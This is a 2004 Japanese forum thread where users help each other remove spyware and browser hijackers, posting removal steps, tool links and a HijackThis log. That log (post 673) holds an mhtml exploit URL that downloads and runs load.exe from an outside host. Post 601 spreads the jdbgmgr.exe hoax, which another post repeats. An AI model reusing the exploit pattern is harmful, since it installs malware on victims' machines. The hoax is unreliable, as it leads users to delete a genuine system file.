5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

580 :ひよこ名無しさん:04/05/22 02:40 ID:???
                 / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                 | ちょっ、ちょっと待って!
                 | みんな年金払ってる?
      , ,-;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:,. ヽ─y──────────────   ,-v-、
    /;:;:;:;:;:;:ミミ;:;:;:;:;:;:;:;:;:;`、                          / _ノ_ノ:^)
    /;:;:;:;:彡―ー-、_;:;:;:;:;:;:;:;|                           / _ノ_ノ_ノ /)
    |;:;:;:ノ、    υ、;;:;:;:;:;:i                        / ノ ノノ//
    |;:/_ヽ ,,,,,,,,,, υ|;:;:;:;:;:;!                      ____/  ______ ノ
    | ' ゚ ''/ ┌。-、  |;:;:;:;:/                     _.. r("  `ー" 、 ノ
    |` ノ(  ヽ  ソ  |ノ|/               _. -‐ '"´  l l-、    ゙ ノ
_,-ー| /_` ”'  \  ノ   __       . -‐ ' "´        l ヽ`ー''"ー'"
 | :  | )ヾ三ニヽ   /ヽ ' "´/`゙ ーァ' "´  ‐'"´         ヽ、`ー /ノ
 ヽ  `、___,.-ー' |   /   /                __.. -'-'"
  |    | \   / |   l   /            . -‐ '"´
  \   |___>< / ヽ


581 :ひよこ名無しさん:04/05/22 04:40 ID:???
微妙にちょっとスレ違いな質問ですが・・・

ウイルスにかかった後、除去するのには成功したのですが、
何故かその後に動作が『重く』なってしまいました。

特に、保存したエ○画像を開く時なんか、いつもの5倍の時間は
かかっています。

これは、どうやったら直るのでしうか?


582 :581:04/05/22 04:44 ID:???
なんか直ったみたいです。お騒がせしました。

583 :ひよこ名無しさん:04/05/22 05:01 ID:???
ほしゅ

584 :581 ◆NP67jHR9o6 :04/05/22 05:06 ID:???
>>582
ニセモノ・・・そりゃあないですよ。
トリップつけておきます。


585 :ひよこ名無しさん:04/05/22 05:14 ID:???
完全には駆除できてないんだろ。

586 :ひよこ名無しさん:04/05/22 09:19 ID:???
>>560
CnsMinの除去方法
ttp://higaitaisaku.web.infoseek.co.jp/removecnsmin.html

これはやったの?

587 :ひよこ名無しさん:04/05/22 09:54 ID:6xBf/riA
初心者総合質問スレから来ました。
お願いします。
OSはXPで、ブラウザはIEです。
三日程前からスパイウェアに侵されています。
ホームがworld-search.bizになります。元に戻しても、自動的に書き換えられて戻りません。
放っておくと数十秒毎に次々ウインドーが開いていき、何かを勝手にダウンロードしようとしたりします。
また、CoolWebShredder、Spybot-S&Dのダウンロードができません。関連ページに行こうとしただけで、ブラウザが閉じます。
テンプレの1,2,3,6のbは実行済みです。
4,5は該当なし。6のa,cは上記の理由で不可です。
先日ノートンアンチウイルスを購入しましたが、まだインストールはしていません。
システムの復元は途中で行き詰ってます。hostsファイルを置き換えても、上記の通り、まだ行けないページがあるんです。
どうすればよいでしょうか。

588 :ひよこ名無しさん:04/05/22 09:56 ID:???
>>587
http://higaitaisaku.web.infoseek.co.jp/removehacdef.html

589 :ひよこ名無しさん:04/05/22 09:57 ID:???
>>587
ノートンをインストールしてみてはどうでしょうか?

590 :587:04/05/22 10:01 ID:6xBf/riA
>>588
そこに従いシステムの復元を試みたんですが・・・


591 :587:04/05/22 10:03 ID:6xBf/riA
>>589
はい。では、とりあえずそうしてみます。

592 :ひよこ名無しさん:04/05/22 10:08 ID:???
ノ−トンで駆除出来なかったウィルス(?)を
spybodできれいに追い出せました。
一方的ですが、感謝します。ありがとうございました。

593 :ひよこ名無しさん:04/05/22 10:08 ID:Vf9buF9J
おい。OKボタン一個だけのが出てきたら、押しちゃまずいのか?今すぐ答えろ!

594 :ひよこ名無しさん:04/05/22 10:09 ID:???
>>593
とりあえず押しとけ
話はそれからだ

595 :ひよこ名無しさん:04/05/22 10:10 ID:???
>>593
またきたのか?
Windowsの入門書以上の書籍買ってボタンに関して理解を深めろ。

596 :ひよこ名無しさん:04/05/22 10:11 ID:???
>>593
そんなもの出たこともないし、もちろん押したこともないので
押してみてどうなったか報告してくれ

597 :ひよこ名無しさん:04/05/22 10:16 ID:???
>>596
エロサイト見たら・・・押してください!

598 :587:04/05/22 11:34 ID:6xBf/riA
無事にインストールはできましたが、ノートンが機能しません。
起動しようとしてもウインドウが開きません。また、開いても瞬時に閉じてしまいます。

599 :ひよこ名無しさん:04/05/22 11:40 ID:???
>>598
>>516

600 :ひよこ名無しさん:04/05/22 11:51 ID:???
>>598
ウィルス対策もしないで、いざ困ってから助けて〜なんて…
リカバリしろ

601 :ひよこ名無しさん:04/05/22 13:02 ID:???
>>587

それは間違いなくjdbgmdrだな
このウイルスは Norton や McAfee のシステムでは消せない。
ウイルスはダメージを与えるシステムを作動する前に最大14 日間留まる。

簡単な削除は以下の通り


1スタートから始めて、検索を選択汁。そこからファイルやフォルダを選択汁
2名前のところに jdbgmgr.exe と書く。
3探す場所が C: drive になっていることを確認汁。
4検索開始 をクリック汁
5万一名前が jdbgmgr.exe の小さなクマのアイコンがあったら感染済み。絶対に開くな。
6そのアイコンを右クリックして、削除。
7ゴミ箱を空に汁。
8再起
9IEを開いて改善されたかチェック


602 :ひよこ名無しさん:04/05/22 13:05 ID:???
>>601
氏ね
http://support.microsoft.com/default.aspx?scid=kb;JA;JP322993

603 :ひよこ名無しさん:04/05/22 13:07 ID:???
>>601
ワラタ

604 :ひよこ名無しさん:04/05/22 13:11 ID:???
>>601
ウィルス貼っても誰も踏んでくれないから手法を変えたのか?

605 :ひよこ名無しさん:04/05/22 13:31 ID:???
>>604
ウイルス?どれが・・・??

606 :ひよこ名無しさん:04/05/22 13:34 ID:???
>>605
>>112 に説明。

607 :587:04/05/22 14:11 ID:6xBf/riA
>>599
ダウンロードして、起動しようとしたところ、
CWSSK has not been found on your system.
と出て、何も起こりませんでした。

608 :496 ◆B0iOQRAl/w :04/05/22 14:15 ID:???
名無しに戻ると言いましたがレスがついてたので書き込みさせて頂きます。m_ _m

>>586
リンク先見たら完全に除去できるとゆーソフトが紹介されていたので
これを信頼して実行してみたところ、spybotでも検知できなくなりました。
お手数お掛けして申し訳ありません。本当に感謝です。
また>>564で名無しに戻ると書いてるのも関わらず、レスを下さったことにも
重ねて御礼申し上げます。有難う御座いました。

皆様方、本当に有難う御座いました。

>>586氏のレスで完全にスパイウェアの除去ができましたので
今度こそ、>>496は名無しに戻ります。m_ _m

609 :ひよこ名無しさん:04/05/22 14:17 ID:???
>>587
http://higaitaisaku.web.infoseek.co.jp/index.html
全部読め

だいたいテンプレとリンク先を読めば解決できるのになぜ読まない?

610 :587:04/05/22 14:32 ID:6xBf/riA
>>609
?

611 :ひよこ名無しさん:04/05/22 14:33 ID:???
>>610
??

612 :587:04/05/22 14:35 ID:6xBf/riA
>>609
>>587読んだ?

613 :ひよこ名無しさん:04/05/22 14:35 ID:???
>>587
どこを読んで何をするかの指示まで貰うつもりか?

コマンドプロンプトから以下をやれ
net stop HackerDefender100


614 :587:04/05/22 14:39 ID:6xBf/riA
当方が初心者である事を理解している方お願いします。

615 :ひよこ名無しさん:04/05/22 14:41 ID:???
>>614
リカバリしれ

616 :ひよこ名無しさん:04/05/22 14:44 ID:???
つまり対策読むのが面倒だから駆除の方法だけ教えろと?
セキュリティの知識を深めて今後役に立てようと考えないんだね?
そういう人はOS再インスコでバッチリ!!

617 :ひよこ名無しさん:04/05/22 14:47 ID:???
>>587
プロセス見てあやしい*.exeを覚える。

あとはセーフモードにして以下全部やってみれ。

スパイウェア除去ソフトを全部実行。
hostsファイルの中身の掃除。
レジストリであやしい箇所のキーの中身、キー自体の削除。
アプリケーションの追加と削除であやしいアプリの削除。
通常起動時のあやしい*.exeを検索して全部削除。

言うとくけど自己責任な。信用できないならしなければいいし。

あとIEばっかり使うんじゃなくて色んなブラウザでDLや
サイトを開いてみるといい。他のブラウザなら開く可能性もある。
保障はしない。あくまで可能性だから。

618 :ひよこ名無しさん:04/05/22 15:29 ID:???
>>587
>>また、CoolWebShredder、Spybot-S&Dのダウンロードができません。関連ページに行こうとしただけで、ブラウザが閉じます。

>>613はやったのか?
話はそれからだ

619 :ひよこ名無しさん:04/05/22 16:40 ID:???
IEを開いたら変なウインドウがたくさんでてきてデスクトップにいろいろな物がでてきてそのときに
タスクトレイにdesktop search applicationというソフトがでてきてしまってそれが常駐してしまって
そのソフトで検索すると
ttp://results.searchcentrix.shopnav.com/apps/epa/epa?cid=shnv9888&s=null
のようなサイトに飛ばされます。しかも削除ができません。
どうすればいいでしょうか?お願いします教えてください。



620 :ひよこ名無しさん:04/05/22 16:45 ID:???
テンプレ読まない人多いね〜

621 :ひよこ名無しさん:04/05/22 16:58 ID:???
>>619
「windows Q&A」
http://www.geocities.co.jp/SiliconValley/3657/windows/

622 :619:04/05/22 17:28 ID:???
SASSERというウイルスの駆除ツールもやってみましたが違ったようです。
ほんとどなたかおしえてくださいお願いします。

623 :ひよこ名無しさん:04/05/22 17:29 ID:???
>>622
>>621


624 :ひよこ名無しさん:04/05/22 17:33 ID:???
>>619
>>1

625 :ひよこ名無しさん:04/05/22 17:34 ID:???
>>619
飛んで、飛んで、アンインストーラ

626 :619:04/05/22 17:42 ID:???
ごめんなさい。ほんと初心者なので意味がよくわかりません・・・。
>>1を見てはいるのですが・・・。

627 :619:04/05/22 17:58 ID:???
解決しました。初心者なんて実はウソです。

628 :ひよこ名無しさん:04/05/22 17:59 ID:???
>>627


629 :ひよこ名無しさん:04/05/22 18:02 ID:???
>>6にあるツールをダウンロード、セーフモードで実行しあやしい物を削除(自己責任でやる)
使い方はテンプレのサイトにある

初心者というなら今ここで勉強しろ。1から全て教えてくれるのは学校だけだ。
それにテンプレは初心者のためにある。まずは隅々まで読め。
(分からない事は”調べる”。インターネットはそのためにある)

630 :ひよこ名無しさん:04/05/22 18:15 ID:???
ここは初めて覗いて見たのだけど、
1からROMってみると本当にテンプレ読まない人が多いですね。

>>621
今更ながら笑わせてもらいました。

631 :ひよこ名無しさん:04/05/22 18:15 ID:???
■■■ 重要 ■■■

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、自分でしたことと結果を明記。

632 :619:04/05/22 18:18 ID:???
>>627は偽者です
>>629
がんばってみます。ありがとうございました

633 :ひよこ名無しさん:04/05/22 18:18 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

634 :ひよこ名無しさん:04/05/22 18:24 ID:???
チュンチュン

635 :ひよこ名無しさん:04/05/22 19:19 ID:???
>>619
http://www.shopnav.com/

Easy!

We do hope your web searching experience has been
enhanced by ShopNav. However, you may choose to
uninstall it at any time by clicking here:

Uninstall Now

636 :ひよこ名無しさん:04/05/22 21:20 ID:w6QjVbIw
こんばんわ。
毎回PCを起動させる度に広告サイトが出てきて困っていたので
Spybot1.3やAdawareなどをインストールし、一応駆除しているのですが
起動させて駆除してから数時間してからまたそれらの駆除ソフトを
試みるとまた7箇所くらいから感染源が見つかります。
一応システムの復元にはチェックを入れてないのですがなぜ後から後から
復活(?)してしまうのでしょう?

637 :ひよこ名無しさん:04/05/22 21:23 ID:???
>>636
DSO Expliotなら無害

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、自分でしたことと結果を明記。
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

638 :ひよこ名無しさん:04/05/22 22:03 ID:???
ふ〜ん

639 : ◆7nVWiBpJOc :04/05/22 22:42 ID:JSOHi2Eq
OS : 98
ブラウザ : DonutP
セキュリティソフト : 無し


 症状

・ IEのホームが http://jksearch.biz/redir.php になる。
・ マイコンピューターやコントロールパネルを開こうとするとフリーズする。


 行った処置

@ IEオプション → web設定のリセット。
A CoolWebShredder を使用。
B Ad-aware 6.0 を使用。
C Spybot Search&Destroy 1.2 を使用。


 結果

@ ホームが http://jksearch.biz/redir.php になるのは何度やっても改善されず。
AB 最初にいくつか検出、削除。
C 最初にいくつか検出、削除。二度目以降は DSO Exploit を検出、削除。何度やってもDSOは検出。
  マイコンピューター、コントロールパネルは開こうとするとフリーズ。


アプリケーション関係は何もわかりません。ご指導お願いします。

640 :ひよこ名無しさん:04/05/22 22:42 ID:???
今夜はなんとも寂れているねェ

641 :ひよこ名無しさん:04/05/22 22:45 ID:???
>>639
セーフモードでもう一度全ての作業やってみる
それと
>>473を確認する

HIJACKTHISも使えよ

642 :ひよこ名無しさん:04/05/22 22:46 ID:???
>>363
>>641と同じ事やってみな

2人とも自己責任でな

643 :ひよこ名無しさん:04/05/22 22:47 ID:???
>>363
>>639
ウィルスのスキャンもしておけよ

644 :ひよこ名無しさん:04/05/22 22:52 ID:???
>>639
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\shellServiceObjectDelayLoad
このレジストリに↓があったら削除
System=C:\WINDOWS\system32\system32.dll

その後ファイルも削除

645 :ひよこ名無しさん:04/05/22 22:57 ID:???
>>639のやつってしつこいみたいだね
前スレ989も直ったかどうか不明だし


646 :ひよこ名無しさん:04/05/22 23:16 ID:???
>>639
>>46

647 :ひよこ名無しさん:04/05/22 23:34 ID:9Fg8JZC2
なんか、ブラウザ開くとserchexeなんたらってのがでて、下
に、変なブラウザが出てきたりBendKindMeetってのが出てきます。
あと、ネットサーフ中とかにいきなり外国のサイトの窓が出てきたり・・・。
これはわからんけど、うえの症状がおきるようになってから、
ものすごく重くなったようなきがします。どうしたらいいでしょう

648 :ひよこ名無しさん:04/05/22 23:40 ID:???
>>647
>>1から読んで、やること全部やってから質問すると、きっと解決できるよ

649 :647:04/05/23 00:14 ID:pvnvbCVl
とりあえず、Ad-awaweってのやってるんですが、
スパイウェアが52個ほど検出されました。(異常?)
それで、次に進むと検出されたやつが出ますよね?
そこにタイプがプロセスだとかレジスタリキーだとかがあるんですが、
初心者はたしかレジストリなんかをいじらないほうがいいんですよね?
でもこういうのは消しちゃっていいんでしょうか?

650 :偽ぼるじょあ ◆.FS.okPiNk :04/05/23 00:25 ID:???
Ad-awaweの中にに表示されたものは削除で


651 :ひよこ名無しさん:04/05/23 00:32 ID:???
てすと

652 :ぼるじょあ ◆yBEncckFOU :04/05/23 00:52 ID:???
>>647
(・3・) エェー 初心者はレジストリ云々考える前に>>601をやってみろYO
          そのあと、解決されなければHijackthisのログ出せば見ておくC


653 :ひよこ名無しさん:04/05/23 01:12 ID:Y8pBPVPl
>>601はなんかいろいろ言われてますが・・・。
大丈夫なんですか?

654 :OS XP:04/05/23 01:31 ID:???
あるエロゲをプライバC制御しているマイドキュメントにダウンロードしてそのフォルダに解凍したんですYO
でもユーザーフォルダのアプリケーションフォルダにそのゲームのデータがあったんですYO
このフォルダには何が保存されるんですKA?

655 :ひよこ名無しさん:04/05/23 02:04 ID:???

(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

656 :ひよこ名無しさん:04/05/23 02:32 ID:3bLLGvoY
エロサイト利用して、金払わずに放置してたら
1万位何だけど、相手はどう取るでしょうか
こうゆう事件的な話で、ニュースになった様な事見た記憶無いんだけど
裏ではどうなってるの?

657 :ひよこ名無しさん:04/05/23 02:53 ID:???
ほんとに利用して払わないのは犯罪です
でも払わなくても何も起こりません

658 :ひよこ名無しさん:04/05/23 03:00 ID:???
なるほど

659 :ひよこ名無しさん:04/05/23 03:20 ID:???
故意につかたのなら払わないと。

660 :ひよこ名無しさん:04/05/23 03:29 ID:???

     ∧_∧   お茶ドゾー
    (´・ω・`)_,_ このスレにきた人飲んで行って下さいね  
    (   つ(_ア; 
    と_)_) . 旦

661 :ひよこ名無しさん:04/05/23 03:37 ID:i71RFeyp
初めまして。PC初心者ですが、エロサイトを見ていたら
突然ホームが書き換えられて ttp://school-fuck.com/に設定されます。
ツール−インターネットオプション−ホームページ
でいくら修復しても直りません。どのようにすればよいですか?
どなたか初心者にわかりやすく教えてください。お願いします。

662 :ひよこ名無しさん:04/05/23 03:37 ID:???
以前IEでドイツ語圏のサイトを見回っていた後から

IEが勝手に立ち上がりhttp://www.aqweb.net/~cronous/のサイトにつながる症状になっています
(特にエロは無くアットランダムにいろんなドイツ圏のサイトにつながる)

spybotかけると「CnsMin」という項目がひっかかります

メモリー上にあるので再起動後spybotを起動させれば解決できます

とでるのですが、それの繰り返しで消せません
システムの復元でもダメでした

リカバリーしかありませんか?

663 :ひよこ名無しさん:04/05/23 03:41 ID:???
>>661
スパイウェア駆除する

664 :ひよこ名無しさん:04/05/23 03:44 ID:3A+HfXXA
∩___∩
        | ノ      ヽ
       /  ●   ● |   / ̄ ̄ ̄ ̄ ̄ ̄ ̄
       |    ( _●_)  ミ < 通報したクマ
      彡、   |∪|  、`   \_______
       (ぃ9. ヽノ ../  
       ./       /、    
      /      ∧_二つ    n_____n
      /      /       ノ '     ヽ    / ̄ ̄ ̄ ̄ ̄ ̄ ̄
     /       \      i  ●  ●l、 < 通報したクマ 
    ./    /~\  .\    ,メ、. (__●.) ヾ   \_______
    /    /   >   )     (ぃ9 .U '   
  /   ノ    /  /    ./     .∧つ   ○_○
 ./   /     /  ./     ./     .\   (・(エ)・) クマ- 
../ .  /     (  ヽ、     / /⌒~~> .)   ゚(  )−.  ,、_,、
(_ _)      \_ _つ  (_)    .\__つ  / >    l ゚(・)゚l マ-



665 :ひよこ名無しさん:04/05/23 03:47 ID:???
>>662
 ●【緊急】 早く治したい方は以下を実行して下さい 【処置】●

   WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

1)IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→プログラム→WEB設定のリセット

2)IEの履歴削除→ツール→インターネットオプション→全般→インターネット一時ファイル→クッキーの削除+ファイルの削除

3)削除したいファイルがあるが「アクセスできません。使用中です」等といわれて削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動

4)勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→アプリケーションの追加と削除(JWordはここでアンインストする)→OS再起動

5)ブラウザジャッカーCoolWebSearch駆除ツール CoolWebShredderをDL
  http://users.hoops.ne.jp/ee94012/hayanet21st/index-1.htm  →OS再起動

6)定番スパイウェア除去ソフト↓をインストール(併用推奨)

 ・定番 スパイウェア除去ソフト Ad-Aware 使用法
  http://www.oct-net.ne.jp/~missile/altoegoh/r.htm
 ・定番 スパイウェア除去ソフト Spybot-S&D 使用法
  http://perso.wanadoo.es/lsmagsupermix1/

7)Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元]

666 :ひよこ名無しさん:04/05/23 04:03 ID:i71RFeyp
663さん
そのサイトに行ってみたら英語でよくわからないのですが
何をどうすればよいか教えていただけますか?

667 :ひよこ名無しさん:04/05/23 04:08 ID:???
《応急処置》

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

668 :ひよこ名無しさん:04/05/23 04:12 ID:???

《アンチスパイソフト》
■CWShredder CoolWebSearch専用駆除ソフト 更新:高
 ☆本家 ttp://www.spywareinfo.com/~merijn/downloads.html
■Ad-aware 6.0 Build181 非常駐・検索・削除 (有料版は常駐監視機能あり)
 ☆本家 ttp://www.lavasoftusa.com/ 更新:中 
  http://www.dream-seed.com/server/spy.html 使用法
■Spybot Search&Destroy 1.2 & 1.3β4非常駐・検索・削除・一部予防
 本家 ttp://www.safer-networking.org/ 更新:低 日本語対応済み。
 http://www.dream-seed.com/server/spybot.html 使用法
 
 -------------以上3大定番は必ずインストールしておきましょう---------

669 :639 ◆7nVWiBpJOc :04/05/23 04:16 ID:bC7FBUUb
えーと、


 行った処置

セーフモードで

@ IEオプション → web設定のリセット。
A CoolWebShredder を使用。
B Ad-aware 6.0 を使用。
C Spybot Search&Destroy 1.2 を使用。

更に

D HIJACKTHIS の使用。


 結果

@ IEのホームが http://jksearch.biz/redir.php になる。   健在。
A マイコンピューターやコントロールパネルを開こうとするとフリーズする。   健在。

Aの方はどうやら「何らかのフォルダを開こうとするとフリーズする」みたいです。
Ad-aware 6.0の日本語化とかも出来ない つД`)

とりあえず下に HIJACKTHIS の結果貼らせていただきます。スレ汚し御免。また起きたらきます。

670 :639 ◆7nVWiBpJOc :04/05/23 04:17 ID:bC7FBUUb
Logfile of HijackThis v1.97.7
Scan saved at 3:52:02, on 04/05/23
Platform: Windows 98 Gold (Win9x 4.10.1998)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\IMEJP98M.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\WINDOWS\デスクトップ\HJTHIS\HIJACKTHIS.EXE

671 :ひよこ名無しさん:04/05/23 04:18 ID:???
>>666
スパイウェア駆除ツールなんか使ってる?

672 :639 ◆7nVWiBpJOc :04/05/23 04:18 ID:bC7FBUUb
F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: (no name) - {CF021F40-3E14-23A5-CBA2-717765721306} - C:\WINDOWS\SYSTEM\WER1306.DLL
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHELPER.DLL
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [internat.exe] internat.exe
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [AlpsPoint] C:\Progra~1\Apoint\Apoint.exe
O4 - HKLM\..\Run: [StillImageMonitor] C:\WINDOWS\SYSTEM\STIMON.EXE
O4 - HKLM\..\Run: [DXM6Patch_981116] C:\WINDOWS\p_981116.exe /Q:A
O4 - HKLM\..\Run: [SM Unplug] SMUnplug.exe
O4 - HKLM\..\Run: [Services Process] C:\WINDOWS\system32\config\services.exe
O4 - HKLM\..\Run: [System Backup] ms32.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKCU\..\Run: [Taskbar Display Controls] RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY
O4 - Startup: SideWinder ゲーム コントローラ プロファイラ.lnk = D:\Game Controllers\SWTRAY.EXE
O4 - Startup: JSクイックサーチファイル 自動更新.LNK = C:\JUST\JSLIB32\JSQSF32.EXE
O4 - Startup: JSクイックランチ.LNK = C:\JUST\JSLIB32\JSQLNCH.EXE
O4 - Startup: inkMaster.LNK = D:\InkMaster\InkMaster.exe


673 :639 ◆7nVWiBpJOc :04/05/23 04:19 ID:bC7FBUUb
O8 - Extra context menu item: ギコペに追加(&G) - D:\GAME\
O8 - Extra context menu item: ギコペのお気に入りに追加(&F) - D:\GAME\
O8 - Extra context menu item: Ascii Art Editorで編集(&A) - D:\GAME\
O8 - Extra context menu item: ブラクラチェッカー(&B) - D:\GAME\
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: MSN Messenger Service (HKLM)
O12 - Plugin for .mov: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin.dll
O12 - Plugin for .png: C:\PROGRA~1\INTERN~1\PLUGINS\npqtplugin.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/ansi/iuctl.CAB?38102.2295138889
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004033001/housecall.antivirus.com/housecall/xscan53.cab
O16 - DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!http://petite-virgins.biz/dl/ms/x.chm::/load.exe


674 :ひよこ名無しさん:04/05/23 04:20 ID:???
>>669
Ad-aware 6.0日本語でググれば出てくるよ

675 :639 ◆7nVWiBpJOc :04/05/23 04:23 ID:bC7FBUUb
>>674
落としましたがAの症状が出て、フォルダを開こうとするとフリーズ。
一応英語のままでも初歩的な使い方はわかるんで症状が改善されるまで待ちます。

676 :ひよこ名無しさん:04/05/23 04:50 ID:i71RFeyp
671さん
Ad-aware とSpybotというソフトとインストールしようとしていますが
初心者なんで手探りでやっております。スパイウェアというもので解決できるのですよね?


677 :ひよこ名無しさん:04/05/23 04:59 ID:???
>>676
ウィルスにさえ感染していなければ、スパイウェアを駆除すれば、
大概は解決できると思うよ。
仮に解決できなくても、この機会にスパイウェア対策を憶えるのも良いと思うよ

678 :ひよこ名無しさん:04/05/23 05:08 ID:zhTlpLGv
前に例の「USsaerch」っていう変なウインドウがデスクトップに常駐する
症状に陥って、システムの復元で回復したんですが(3日くらい前の話)
今日になってまたデスクトップに奴が帰ってきてるんですが。

これってシステムの復元じゃ完全に回復できないって事なんですか?


679 :ひよこ名無しさん:04/05/23 05:10 ID:???
>>678
ウィルス対策はちゃんとしてる?
スパイウェア対策はちゃんとしてる?
その辺を書いて質問してくれないと答えようがありません。

